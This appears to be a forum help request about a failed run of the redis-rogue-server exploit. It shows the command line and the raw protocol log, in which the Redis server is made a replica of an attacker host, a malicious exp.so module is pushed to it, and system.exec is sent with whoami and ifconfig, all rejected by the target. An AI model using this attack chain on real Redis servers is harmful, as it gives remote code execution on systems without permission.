I am new to this forum and looking for some help to understand this exploit. I am trying to check command execution on a vulnerable Redis server.
Following this document, I am able to exploit a Redis server but I am not able to type in any commands i.e. not giving me output. I see OK
printed on a command prompt of the server. Anything I am missing here or the commands need to be executed differently on this shell:
root/redis-rogue-server# python3 redis-rogue-server.py --rhost 10.10.10.11 --rport 6379 --lhost 10.10.10.10 --lport 21001
TARGET 10.10.10.11:6379
SERVER 10.10.10.10:21001
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$13\r\n10.10.10.10\r\n$5\r\n21001\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'PING\r\n'
[<-] b'+PONG\r\n'
[->] b'REPLCONF listening-port 6379\r\n'
[<-] b'+OK\r\n'
[->] b'REPLCONF capa eof\r\n'
[<-] b'+OK\r\n'
[->] b'PSYNC ? -1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$48560\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xb6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<<] whoami
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$6\r\nwhoami\r\n'
[<<] ifconfig
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$8\r\nifconfig\r\n'
[->] b"-ERR unknown command 'system.exec'\r\n"